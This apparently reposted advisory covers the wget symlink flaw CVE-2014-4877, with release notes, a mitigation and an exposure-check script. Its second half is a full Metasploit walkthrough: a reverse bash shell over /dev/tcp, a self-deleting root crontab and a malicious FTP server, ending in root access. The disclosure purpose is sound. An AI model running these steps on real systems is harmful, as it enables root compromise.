2014. 10. 31. 18:03

Wget FTP Symlink Attack Vulnerability



[Bug-wget] GNU wget 1.16 released

It is available for download here:


and the GPG detached signatures using the key E163E1EA:


To reduce load on the main server, you can use this redirector service
which automatically redirects you to a mirror:


* Noteworthy changes in Wget 1.16

** No longer create local symbolic links by default.  Closes CVE-2014-4877.

** Use libpsl for verifying cookie domains.

** Default progress bar output changed.

** Introduce --show-progress to force display the progress bar.

** Introduce --no-config.  The wgetrc files will not be read.

** Introduce --start-pos to allow starting downloads from a specified position.

** Fix a problem with ISA Server Proxy and keep-alive connections.

"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"
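
The two mitigations named above (wget 1.16 or later, or retr-symlinks=on in /etc/wgetrc or ~/.wgetrc) can be checked per host. The script below is an added example, not part of the original post or of the wget project. Its function names are hypothetical, and it relies on wget treating wgetrc command names as case-, hyphen- and underscore-insensitive and accepting on/yes/1 as true.

```shell
#!/bin/sh
# Added example, not from the original page: report whether either mitigation
# is in place (wget >= 1.16, or retr-symlinks=on in a wgetrc file).
# Caveat: a distribution package may carry a backported fix under an older
# version number, which a version comparison cannot see.

# fixed_by_version "GNU Wget 1.15 built on linux-gnu." -> 0 if version >= 1.16
fixed_by_version() {
  v=$(printf '%s\n' "$1" | grep -oE '[0-9]+\.[0-9]+' | head -n 1)
  [ -n "$v" ] || return 1                 # unparseable: assume not fixed
  major=${v%%.*}; minor=${v#*.}
  [ "$major" -gt 1 ] || { [ "$major" -eq 1 ] && [ "$minor" -ge 16 ]; }
}

# retr_symlinks_on FILE... -> 0 if the effective setting is on. Files are read
# in the order given (global, then per-user); the last assignment wins.
retr_symlinks_on() {
  state=off
  for f in "$@"; do
    [ -r "$f" ] || continue
    while IFS= read -r line || [ -n "$line" ]; do
      case $line in *=*) ;; *) continue ;; esac
      key=$(printf '%s' "${line%%=*}" | tr -d ' \t_-' | tr 'A-Z' 'a-z')
      val=$(printf '%s' "${line#*=}" | tr -d ' \t\r' | tr 'A-Z' 'a-z')
      # A commented-out line yields a key starting with '#', so it never matches.
      [ "$key" = retrsymlinks ] || continue
      case $val in on|yes|1) state=on ;; *) state=off ;; esac
    done < "$f"
  done
  [ "$state" = on ]
}

# wget_symlink_exposed VERSION_STRING FILE... -> 0 if neither mitigation applies
wget_symlink_exposed() {
  ver=$1; shift
  if fixed_by_version "$ver"; then return 1; fi
  if retr_symlinks_on "$@"; then return 1; fi
  return 0
}

# Check this host if wget is installed.
if command -v wget >/dev/null 2>&1; then
  if wget_symlink_exposed "$(wget --version 2>/dev/null | head -n 1)" /etc/wgetrc "$HOME/.wgetrc"; then
    echo "EXPOSED: wget older than 1.16 and retr-symlinks is not on"
  else
    echo "OK: wget 1.16 or later, or retr-symlinks=on"
  fi
fi
```

The config check does not cover scripts that pass their own options on the wget command line; those need to be reviewed separately.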



We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.


msfpayload cmd/unix/reverse_bash LHOST= LPORT=4444 R

0<&112-;exec 112<>/dev/tcp/;sh <&112 >&112 2>&112


Next we create a crontab file that runs once a minute, launches this command, and deletes itself:


cat>cronshell <<EOD


* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell



Now we start up msfconsole and configure a shell listener:



msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash

msf exploit(handler) > set LHOST

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > run -j

[*] Exploit running as background job.

[*] Started reverse handler on


Finally we switch to the wget module itself:


msf exploit(handler) > use auxiliary/server/wget_symlink_file_write

msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell

msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell

msf auxiliary(wget_symlink_file_write) > set SRVPORT 21

msf auxiliary(wget_symlink_file_write) > run

[+] Targets should run: $ wget -m

[*] Server started.


At this point, we just wait for the target user to run wget -m


[*] Logged in with user 'anonymous' and password 'anonymous'...

[*] -> LIST -a

[*] -> CWD /1X9ftwhI7G1ENa

[*] -> LIST -a

[*] -> RETR cronshell

[+] Hopefully wrote 186 bytes to /etc/cron.d/cronshell

[*] Command shell session 1 opened ( -> at 2014-10-27 23:19:02 -0500



msf auxiliary(wget_symlink_file_write) > sessions -i 1

[*] Starting interaction with 1...



uid=0(root) gid=0(root) groups=0(root),1001(rvm)
